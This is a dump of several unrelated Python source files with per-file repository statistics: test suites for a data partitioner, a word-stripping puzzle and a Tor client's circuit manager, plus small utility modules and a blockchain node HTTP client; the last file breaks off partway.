partitioner = app_driver._data_partitioner
self.assertTrue(partitioner.has_training)
self.assertTrue(partitioner.has_inference)
self.assertTrue(partitioner.has_validation)
class DriverPartitionerTestNoFile(tf.test.TestCase):
def test_training(self):
clear_target()
user_param = generate_input_params(
SYSTEM={'action': 'train',
'dataset_split_file': TARGET_FILE
},
TRAINING={'validation_every_n': 2,
'validation_max_iter': 1,
'exclude_fraction_for_validation': 0.1,
'exclude_fraction_for_inference': 0.1,
}
)
data_param = _generate_data_param()
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, data_param)
partitioner = app_driver._data_partitioner
self.assertTrue(partitioner.has_training)
self.assertTrue(partitioner.has_inference)
self.assertTrue(partitioner.has_validation)
def test_training_no_validation(self):
clear_target()
user_param = generate_input_params(
SYSTEM={'action': 'train',
'dataset_split_file': TARGET_FILE
},
TRAINING={'validation_every_n': -1,
'validation_max_iter': 1,
'exclude_fraction_for_validation': 0.0,
'exclude_fraction_for_inference': 0.0,
}
)
data_param = _generate_data_param()
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, data_param)
partitioner = app_driver._data_partitioner
self.assertFalse(partitioner.has_training)
self.assertFalse(partitioner.has_inference)
self.assertFalse(partitioner.has_validation)
self.assertTrue(partitioner.all_files is not None)
clear_target()
user_param = generate_input_params(
SYSTEM={'action': 'train',
'dataset_split_file': TARGET_FILE
},
TRAINING={'validation_every_n': -1,
'validation_max_iter': 1,
'exclude_fraction_for_validation': 0.0,
'exclude_fraction_for_inference': 0.0,
}
)
data_param = _generate_data_param()
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, data_param)
partitioner = app_driver._data_partitioner
self.assertFalse(partitioner.has_training)
self.assertFalse(partitioner.has_inference)
self.assertFalse(partitioner.has_validation)
self.assertTrue(partitioner.all_files is not None)
def test_inference(self):
clear_target()
user_param = generate_input_params(
SYSTEM={'action': 'inference',
'dataset_split_file': TARGET_FILE
},
TRAINING={'validation_every_n': 1,
'validation_max_iter': 1,
'exclude_fraction_for_validation': 0.1,
'exclude_fraction_for_inference': 0.0,
}
)
data_param = _generate_data_param()
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, data_param)
self.assertTrue(app_driver._data_partitioner is not None)
self.assertFalse(os.path.isfile(TARGET_FILE))
partitioner = app_driver._data_partitioner
self.assertTrue(partitioner._partition_ids is None)
def test_inference_no_validation(self):
clear_target()
user_param = generate_input_params(
SYSTEM={'action': 'inference',
'dataset_split_file': TARGET_FILE
},
)
data_param = _generate_data_param()
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, data_param)
self.assertTrue(app_driver._data_partitioner is not None)
self.assertFalse(os.path.isfile(TARGET_FILE))
partitioner = app_driver._data_partitioner
self.assertTrue(partitioner._partition_ids is None)
class DriverPartitionerTestNoData(tf.test.TestCase):
def test_no_data_param_infer(self):
clear_target()
user_param = generate_input_params(
SYSTEM={'action': 'inference',
'dataset_split_file': TARGET_FILE
}
)
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, {})
self.assertTrue(app_driver._data_partitioner is not None)
self.assertFalse(os.path.isfile(TARGET_FILE))
partitioner = app_driver._data_partitioner
self.assertFalse(partitioner.all_files)
def test_no_data_param_train(self):
clear_target()
user_param = generate_input_params(
SYSTEM={'action': 'train',
'dataset_split_file': TARGET_FILE
},
TRAINING={'validation_every_n': -1,
'exclude_fraction_for_validation': 0.1,
'exclude_fraction_for_inference': 0.1,
}
)
app_driver = ApplicationDriver()
app_driver.initialise_application(user_param, {})
self.assertTrue(app_driver._data_partitioner is not None)
self.assertFalse(os.path.isfile(TARGET_FILE))
partitioner = app_driver._data_partitioner
self.assertFalse(partitioner.all_files)
if __name__ == "__main__":
tf.test.main()
| 36.400641 | 65 | 0.6168 | 1,142 | 11,357 | 5.728546 | 0.114711 | 0.053653 | 0.055029 | 0.043565 | 0.837053 | 0.814736 | 0.79196 | 0.783094 | 0.769948 | 0.769948 | 0 | 0.010526 | 0.29735 | 11,357 | 311 | 66 | 36.517685 | 0.809273 | 0.007749 | 0 | 0.669145 | 0 | 0 | 0.139459 | 0.05992 | 0 | 0 | 0 | 0 | 0.133829 | 1 | 0.055762 | false | 0 | 0.018587 | 0 | 0.104089 | 0.003717 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c4034ee4ced44113f76cd926f78e968fcaf695be | 135 | py | Python | bioscrape/__init__.py | zoltuz/bioscrape | bf0f1d4b6f68f265fc208733b75ec16c36a28688 | [
"MIT"
] | 16 | 2017-11-16T02:22:25.000Z | 2020-06-15T20:36:44.000Z | bioscrape/__init__.py | zoltuz/bioscrape | bf0f1d4b6f68f265fc208733b75ec16c36a28688 | [
"MIT"
] | 90 | 2020-04-16T23:39:29.000Z | 2021-09-18T18:37:06.000Z | bioscrape/__init__.py | zoltuz/bioscrape | bf0f1d4b6f68f265fc208733b75ec16c36a28688 | [
"MIT"
] | 15 | 2018-04-18T03:09:07.000Z | 2020-06-26T18:02:23.000Z | import bioscrape.random
import bioscrape.types
import bioscrape.simulator
import bioscrape.inference
bioscrape.random.py_seed_random() | 22.5 | 33 | 0.874074 | 17 | 135 | 6.823529 | 0.470588 | 0.517241 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066667 | 135 | 6 | 33 | 22.5 | 0.920635 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0.8 | 0 | 0.8 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c40c37623240d157b1b69b626ae2928afccb8c41 | 2,455 | py | Python | lunespy/server/blocks/__init__.py | lunes-platform/LunesPy | ae50786debb84114582b5fc67ac28ac2ea66b8c5 | [
"Apache-2.0"
] | 4 | 2022-01-06T20:59:36.000Z | 2022-01-07T11:27:19.000Z | lunespy/server/blocks/__init__.py | lunes-platform/LunesPy | ae50786debb84114582b5fc67ac28ac2ea66b8c5 | [
"Apache-2.0"
] | null | null | null | lunespy/server/blocks/__init__.py | lunes-platform/LunesPy | ae50786debb84114582b5fc67ac28ac2ea66b8c5 | [
"Apache-2.0"
] | 1 | 2022-02-11T13:37:03.000Z | 2022-02-11T13:37:03.000Z | from requests import get
from lunespy.server.nodes import Node
def block_from_height(height: int, node_url: str = None) -> dict:
if node_url is None:
full_url = f'{Node.mainnet.value}/blocks/at/{height}'
else:
full_url = f'{node_url}/blocks/at/{height}'  # you must pass your full node URL, including the scheme (e.g. https://)
response = get(full_url)
if response.status_code in range(200, 300):
return {
'status': 'ok',
'response': response.json()
}
else:
return {
'status': 'error',
'response': response.text
}
def range_block(start_block: int, end_block: int, node_url: str = None) -> dict:
if node_url is None:
full_url = f'{Node.mainnet.value}/blocks/seq/{start_block}/{end_block}'
else:
full_url = f'{node_url}/blocks/seq/{start_block}/{end_block}'  # you must pass your full node URL, including the scheme (e.g. https://)
response = get(full_url)
if response.status_code in range(200, 300):
return {
'status': 'ok',
'response': response.json()
}
else:
return {
'status': 'error',
'response': response.text
}
def last_block(node_url: str = None) -> dict:
if node_url is None:
full_url = f'{Node.mainnet.value}/blocks/last'
else:
full_url = f'{node_url}/blocks/last'  # you must pass your full node URL, including the scheme (e.g. https://)
response = get(full_url)
if response.status_code in range(200, 300):
return {
'status': 'ok',
'response': response.json()
}
else:
return {
'status': 'error',
'response': response.text
}
def blocks_generated_by_specified_address(address: str, start_block: int, end_block: int, node_url: str = None) -> dict:
if node_url is None:
full_url = f'{Node.mainnet.value}/blocks/address/{address}/{start_block}/{end_block}'
else:
full_url = f'{node_url}/blocks/address/{address}/{start_block}/{end_block}'  # you must pass your full node URL, including the scheme (e.g. https://)
response = get(full_url)
if response.status_code in range(200, 300):
return {
'status': 'ok',
'response': response.json()
}
else:
return {
'status': 'error',
'response': response.text
}
| 29.578313 | 142 | 0.573931 | 306 | 2,455 | 4.447712 | 0.173203 | 0.082292 | 0.047024 | 0.070536 | 0.880235 | 0.880235 | 0.875827 | 0.818516 | 0.818516 | 0.818516 | 0 | 0.014027 | 0.303055 | 2,455 | 82 | 143 | 29.939024 | 0.781414 | 0.092464 | 0 | 0.666667 | 0 | 0 | 0.224022 | 0.161044 | 0 | 0 | 0 | 0 | 0 | 1 | 0.060606 | false | 0 | 0.030303 | 0 | 0.212121 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
c40ee1fbf7ec3815b1828bf85041c1f54432be06 | 29 | py | Python | ubadkhabad.py | Divyanshi0409/Python-Programs | 7fb8ab2159cc69de7168bf19f91325b9c7a908c7 | [
"MIT"
] | null | null | null | ubadkhabad.py | Divyanshi0409/Python-Programs | 7fb8ab2159cc69de7168bf19f91325b9c7a908c7 | [
"MIT"
] | null | null | null | ubadkhabad.py | Divyanshi0409/Python-Programs | 7fb8ab2159cc69de7168bf19f91325b9c7a908c7 | [
"MIT"
] | null | null | null | print("Junaid is pagal,dumb") | 29 | 29 | 0.758621 | 5 | 29 | 4.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.068966 | 29 | 1 | 29 | 29 | 0.814815 | 0 | 0 | 0 | 0 | 0 | 0.666667 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
c42cf9a5dfa294fed23f30280732cb2ea7045b95 | 22 | py | Python | apscrypt/__init__.py | Sellig6792/APSCrypt | cfff9c17100237d9197ba2c372a01946d9c419a8 | [
"MIT"
] | 1 | 2021-09-19T15:02:40.000Z | 2021-09-19T15:02:40.000Z | apscrypt/__init__.py | Sellig6792/APSCrypt | cfff9c17100237d9197ba2c372a01946d9c419a8 | [
"MIT"
] | null | null | null | apscrypt/__init__.py | Sellig6792/APSCrypt | cfff9c17100237d9197ba2c372a01946d9c419a8 | [
"MIT"
] | null | null | null | from .crypt import *
| 11 | 21 | 0.681818 | 3 | 22 | 5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.227273 | 22 | 1 | 22 | 22 | 0.882353 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c440fa689671b85484c4d3e4f405145767aac69a | 101 | py | Python | src/layers/__init__.py | jwspaeth/MIT-9.520-Project | 5076e01f230196b99c7bede0632b72152783d17d | [
"MIT"
] | null | null | null | src/layers/__init__.py | jwspaeth/MIT-9.520-Project | 5076e01f230196b99c7bede0632b72152783d17d | [
"MIT"
] | null | null | null | src/layers/__init__.py | jwspaeth/MIT-9.520-Project | 5076e01f230196b99c7bede0632b72152783d17d | [
"MIT"
] | null | null | null | from .LocallyConnected1d import LocallyConnected1d
from .LocallyConnected2d import LocallyConnected2d | 50.5 | 50 | 0.910891 | 8 | 101 | 11.5 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.042553 | 0.069307 | 101 | 2 | 51 | 50.5 | 0.93617 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
c46389ae0c06c26546bc9f1309075f02e670e59f | 93 | py | Python | utils/euclidean_distance.py | devbas/aml-quora | da343ff3499566da082e12329e6228a1d9b34a7a | [
"MIT"
] | null | null | null | utils/euclidean_distance.py | devbas/aml-quora | da343ff3499566da082e12329e6228a1d9b34a7a | [
"MIT"
] | null | null | null | utils/euclidean_distance.py | devbas/aml-quora | da343ff3499566da082e12329e6228a1d9b34a7a | [
"MIT"
] | null | null | null | import numpy as np
def euclidean_distance(x, y):
return np.sqrt(np.sum(np.square(x - y))) | 31 | 44 | 0.698925 | 18 | 93 | 3.555556 | 0.722222 | 0.0625 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.150538 | 93 | 3 | 44 | 31 | 0.810127 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.333333 | false | 0 | 0.333333 | 0.333333 | 1 | 0 | 1 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 6 |
6712b3a9504da80b58aaa1b4eb4c913ec5a7e8f8 | 155 | py | Python | tests/exceptions.py | mazi76erX2/mention-python | 5133f463faa4ef053365fbf15db0a75dbb00a4e5 | [
"MIT"
] | 4 | 2019-04-20T16:32:46.000Z | 2021-10-30T14:14:25.000Z | tests/exceptions.py | mazi76erX2/mention-python | 5133f463faa4ef053365fbf15db0a75dbb00a4e5 | [
"MIT"
] | null | null | null | tests/exceptions.py | mazi76erX2/mention-python | 5133f463faa4ef053365fbf15db0a75dbb00a4e5 | [
"MIT"
] | 3 | 2017-10-11T16:04:23.000Z | 2020-10-26T15:04:09.000Z | class InvalidResponseException(Exception):
pass
class InvalidEndpointException(Exception):
pass
class InvalidURLException(Exception):
pass
| 14.090909 | 42 | 0.780645 | 12 | 155 | 10.083333 | 0.5 | 0.322314 | 0.297521 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16129 | 155 | 10 | 43 | 15.5 | 0.930769 | 0 | 0 | 0.5 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0.5 | 0 | 0 | 0.5 | 0 | 1 | 0 | 1 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 6 |
671f5d748222c4163133fd48cbd6e0bdfebd6aac | 18 | py | Python | build/lib/ESINet/viz/__init__.py | The-Platypus/ESINet | b9b4e8ed8c6a0fa6d082e303014859a054233fd4 | [
"MIT"
] | null | null | null | build/lib/ESINet/viz/__init__.py | The-Platypus/ESINet | b9b4e8ed8c6a0fa6d082e303014859a054233fd4 | [
"MIT"
] | null | null | null | build/lib/ESINet/viz/__init__.py | The-Platypus/ESINet | b9b4e8ed8c6a0fa6d082e303014859a054233fd4 | [
"MIT"
] | null | null | null | from .viz import * | 18 | 18 | 0.722222 | 3 | 18 | 4.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 18 | 1 | 18 | 18 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
676149be7d9706286573982d874a52cedb96bc88 | 186 | py | Python | erpnext_chinese/monkey_patches/utils.py | eanfs/erpnext_chinese | 68c22267b37553092955f2c3c14d35cfdbb79873 | [
"MIT"
] | null | null | null | erpnext_chinese/monkey_patches/utils.py | eanfs/erpnext_chinese | 68c22267b37553092955f2c3c14d35cfdbb79873 | [
"MIT"
] | null | null | null | erpnext_chinese/monkey_patches/utils.py | eanfs/erpnext_chinese | 68c22267b37553092955f2c3c14d35cfdbb79873 | [
"MIT"
] | 1 | 2022-01-27T01:20:08.000Z | 2022-01-27T01:20:08.000Z | from frappe import utils
#因网络问题导致获取用户图像超时,故取消此功能,详见https://gitee.com/yuzelin/erpnext-chinese-docs/issues/I3PXHV
def has_gravatar(email):
return ''
utils.has_gravatar = has_gravatar | 26.571429 | 86 | 0.801075 | 25 | 186 | 5.84 | 0.8 | 0.226027 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.005917 | 0.091398 | 186 | 7 | 87 | 26.571429 | 0.857988 | 0.456989 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.25 | false | 0 | 0.25 | 0.25 | 0.75 | 0 | 1 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 6 |
677ac9b89a92c1538d1180a192c654cb0311d5c7 | 4,171 | py | Python | tests/test_word_stripper.py | donkirkby/sliced_art | f462ba1fdb0959c7db4de1e3e9dadc368b1df206 | [
"MIT"
] | null | null | null | tests/test_word_stripper.py | donkirkby/sliced_art | f462ba1fdb0959c7db4de1e3e9dadc368b1df206 | [
"MIT"
] | 5 | 2020-02-08T17:23:40.000Z | 2021-03-27T19:27:05.000Z | tests/test_word_stripper.py | donkirkby/sliced_art | f462ba1fdb0959c7db4de1e3e9dadc368b1df206 | [
"MIT"
] | null | null | null | from sliced_art.word_stripper import WordStripper
def test_display():
all_words = 'lots of words rail the liar sail lairs of lira rails'.split()
word_stripper = WordStripper(all_words)
target_letter = 'r'
word_stripper[target_letter] = 'rails'
expected_display = 'sail+R -- rail+S, liar+S, lira+S'
display = word_stripper.make_display(target_letter)
assert display == expected_display
def test_unknown_word():
all_words = 'lots of words rail the liar sail lairs of lira rails'.split()
word_stripper = WordStripper(all_words)
target_letter = 'i'
word_stripper[target_letter] = 'rails'
expected_display = 'rals?I -- rail+S, liar+S, sail+R, lira+S'
display = word_stripper.make_display(target_letter)
assert display == expected_display
def test_word_needed():
all_words = 'lots of words rail the liar sail lairs of lira rails'.split()
word_stripper = WordStripper(all_words)
target_letter = 'i'
word_stripper[target_letter] = ''
expected_display = 'I word needed'
display = word_stripper.make_display(target_letter)
assert display == expected_display
def test_wrong_letter():
all_words = 'lots of words rail the liar sail lairs of lira rails'.split()
word_stripper = WordStripper(all_words)
target_letter = 'i'
word_stripper[target_letter] = 'food'
expected_display = 'I word needed'
display = word_stripper.make_display(target_letter)
assert display == expected_display
def test_upper_case_word():
all_words = 'no glib content big man'.split()
word_stripper = WordStripper(all_words)
target_letter = 'l'
word_stripper[target_letter] = 'GLIB'
expected_display = 'big+L'
display = word_stripper.make_display(target_letter)
assert display == expected_display
def test_upper_case_letter():
all_words = 'no glib content big man'.split()
word_stripper = WordStripper(all_words)
target_letter = 'L'
word_stripper[target_letter] = 'glib'
expected_display = 'big+L'
display = word_stripper.make_display(target_letter)
assert display == expected_display
def test_line_feeds():
all_words = '''\
no
glib
content
big
man
'''.splitlines(keepends=True)
word_stripper = WordStripper(all_words)
target_letter = 'l'
word_stripper[target_letter] = 'glib'
expected_display = 'big+L'
display = word_stripper.make_display(target_letter)
assert display == expected_display
def test_letter_clues():
all_words = 'let me tell a tale of a bland land'.split()
word_stripper = WordStripper(all_words, min_words=2)
word_stripper['a'] = 'tale'
expected_clues = dict(a='A', b='B')
clues = word_stripper.make_clues()
assert clues == expected_clues
def test_word_clues():
all_words = 'let me tell a tale of a bland land'.split()
word_stripper = WordStripper(all_words, min_words=2)
word_stripper['a'] = 'tale'
word_stripper['b'] = 'bland'
expected_clues = dict(a='TALE', b='BLAND')
clues = word_stripper.make_clues()
assert clues == expected_clues
def test_make_clues_upper_case_letters():
all_words = 'let me tell a tale of a bland land'.split()
word_stripper = WordStripper(all_words, min_words=2)
word_stripper['A'] = 'tale'
word_stripper['B'] = 'bland'
expected_clues = dict(a='TALE', b='BLAND')
clues = word_stripper.make_clues()
assert clues == expected_clues
def test_change_word():
all_words = 'let me tell a tale of a bland land'.split()
word_stripper = WordStripper(all_words, min_words=2)
target_letter = 'a'
word_stripper[target_letter] = 'late'
word_stripper[target_letter] = 'tale'
expected_display = 'let+A'
display = word_stripper.make_display(target_letter)
assert display == expected_display
def test():
all_words = 'let me tell a tale of a bland land'.split()
word_stripper = WordStripper(all_words, min_words=2)
target_letter = ''
word_stripper[target_letter] = 'let'
expected_display = 'tell-L, tale-A'
display = word_stripper.make_display(target_letter)
assert display == expected_display
| 25.432927 | 78 | 0.704867 | 570 | 4,171 | 4.877193 | 0.110526 | 0.172662 | 0.103597 | 0.116547 | 0.869784 | 0.869784 | 0.869784 | 0.83705 | 0.83705 | 0.83705 | 0 | 0.001485 | 0.19276 | 4,171 | 163 | 79 | 25.588957 | 0.824176 | 0 | 0 | 0.631068 | 0 | 0 | 0.161592 | 0 | 0 | 0 | 0 | 0 | 0.116505 | 1 | 0.116505 | false | 0 | 0.009709 | 0 | 0.126214 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
6792321f3db3df0e42c3a9532e449553fad4645b | 224 | py | Python | pynano/checkers/__init__.py | isidentical/pynano | 29ece35782cacfb3cfcf35bf9b50e6a11cf44d34 | [
"MIT"
] | 2 | 2019-09-15T16:26:32.000Z | 2019-09-15T17:20:40.000Z | pynano/checkers/__init__.py | pynano/pynano | 29ece35782cacfb3cfcf35bf9b50e6a11cf44d34 | [
"MIT"
] | null | null | null | pynano/checkers/__init__.py | pynano/pynano | 29ece35782cacfb3cfcf35bf9b50e6a11cf44d34 | [
"MIT"
] | null | null | null | from pynano.checkers.checker import CHECKERS, NanoSyntaxError, SyntaxChecker
from pynano.checkers.strict import NotAllowedError, StrictSubsetChecker
from pynano.checkers.type import VALID_TYPES, NanoTypeError, TypeValidator
| 56 | 76 | 0.875 | 24 | 224 | 8.125 | 0.625 | 0.153846 | 0.276923 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.075893 | 224 | 3 | 77 | 74.666667 | 0.942029 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
67990ed56be8b4ce99c99e387d4017e6522eda95 | 33 | py | Python | tests/operators/conftest.py | angelneo/http | 850ad937bcaa917743ce9b476ca7d0ff337c243f | [
"MIT"
] | 10 | 2017-03-27T08:34:22.000Z | 2019-11-20T01:02:12.000Z | tests/operators/conftest.py | angelneo/http | 850ad937bcaa917743ce9b476ca7d0ff337c243f | [
"MIT"
] | 7 | 2017-03-20T01:38:57.000Z | 2019-02-12T14:33:26.000Z | tests/operators/conftest.py | grappa-python/http | 0de893e02b98282270d6daa8c48d65d0269b371f | [
"MIT"
] | 5 | 2017-04-09T15:41:54.000Z | 2020-12-18T10:17:33.000Z | from ..conftest import * # noqa
| 16.5 | 32 | 0.666667 | 4 | 33 | 5.5 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.212121 | 33 | 1 | 33 | 33 | 0.846154 | 0.121212 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
67ce0d92034f71c96a8e965173c68e6445d1be29 | 31 | py | Python | techrachit.py | eastmest/Termux-Megapackage | 08f610d25539cfdc5992893996aa4c89630c9a07 | [
"MIT"
] | null | null | null | techrachit.py | eastmest/Termux-Megapackage | 08f610d25539cfdc5992893996aa4c89630c9a07 | [
"MIT"
] | null | null | null | techrachit.py | eastmest/Termux-Megapackage | 08f610d25539cfdc5992893996aa4c89630c9a07 | [
"MIT"
] | null | null | null | print ("tech rachit are here")
| 15.5 | 30 | 0.709677 | 5 | 31 | 4.4 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.16129 | 31 | 1 | 31 | 31 | 0.846154 | 0 | 0 | 0 | 0 | 0 | 0.645161 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 6 |
67da37e0ce30cd0f169b342f278180f371afb21a | 19,440 | py | Python | oppy/tests/unit/circuit/test_circuitmanager.py | nskinkel/oppy | 68c84146da5d7d994fd55ead5df747c93c95a2f5 | [
"BSD-3-Clause"
] | 25 | 2015-01-08T04:37:40.000Z | 2021-07-21T15:06:35.000Z | oppy/tests/unit/circuit/test_circuitmanager.py | nskinkel/oppy | 68c84146da5d7d994fd55ead5df747c93c95a2f5 | [
"BSD-3-Clause"
] | 72 | 2015-01-08T04:38:13.000Z | 2017-06-18T14:35:50.000Z | oppy/tests/unit/circuit/test_circuitmanager.py | nskinkel/oppy | 68c84146da5d7d994fd55ead5df747c93c95a2f5 | [
"BSD-3-Clause"
] | 4 | 2015-01-20T22:17:45.000Z | 2018-05-23T09:15:04.000Z | import mock
from twisted.trial import unittest
from oppy.circuit.circuitmanager import CircuitManager
from oppy.circuit.definitions import (
CircuitType,
DEFAULT_OPEN_IPv4,
DEFAULT_OPEN_IPv6,
)
from oppy.path.path import Path
ID = 0
class CircuitManagerTest(unittest.TestCase):
@mock.patch('oppy.connection.connectionmanager.ConnectionManager',
autospec=True)
@mock.patch('oppy.netstatus.netstatus.NetStatus', autospec=True)
def setUp(self, ns, cp,):
self.ns = ns
self.cp = cp
self.cm = CircuitManager(cp, ns, autobuild=False)
@mock.patch('oppy.stream.stream.Stream', autospec=True)
def test_getOpenCircuit_open_circuit(self, mock_stream):
c = mock.Mock()
r = mock.Mock()
mock_stream.request = r
self.cm._getOpenCandidates = mock.Mock()
self.cm._getOpenCandidates.return_value = [c]
self.cm._buildCircuit = mock.Mock()
self.cm._pending_stream_list = []
d = self.cm.getOpenCircuit(mock_stream)
self.assertEqual(self.successResultOf(d), c)
self.cm._getOpenCandidates.assert_called_once_with(r)
self.assertEqual(self.cm._buildCircuit.call_count, 0)
self.assertEqual(self.cm._pending_stream_list, [])
# TODO: test that the specific correct stream is added to pending list
@mock.patch('oppy.stream.stream.Stream', autospec=True)
def test_getOpenCircuit_pending_circuit(self, mock_stream):
c = mock.Mock()
r = mock.Mock()
mock_stream.request = r
self.cm._getOpenCandidates = mock.Mock()
self.cm._getOpenCandidates.return_value = []
self.cm._getPendingCandidates = mock.Mock()
self.cm._getPendingCandidates.return_value = [c]
self.cm._buildCircuit = mock.Mock()
self.cm._pending_stream_list = []
_ = self.cm.getOpenCircuit(mock_stream)
self.cm._getOpenCandidates.assert_called_once_with(r)
self.cm._getPendingCandidates.assert_called_once_with(r)
self.assertEqual(self.cm._buildCircuit.call_count, 0)
self.assertEqual(len(self.cm._pending_stream_list), 1)
# TODO: test _buildCircuit is called with correct args
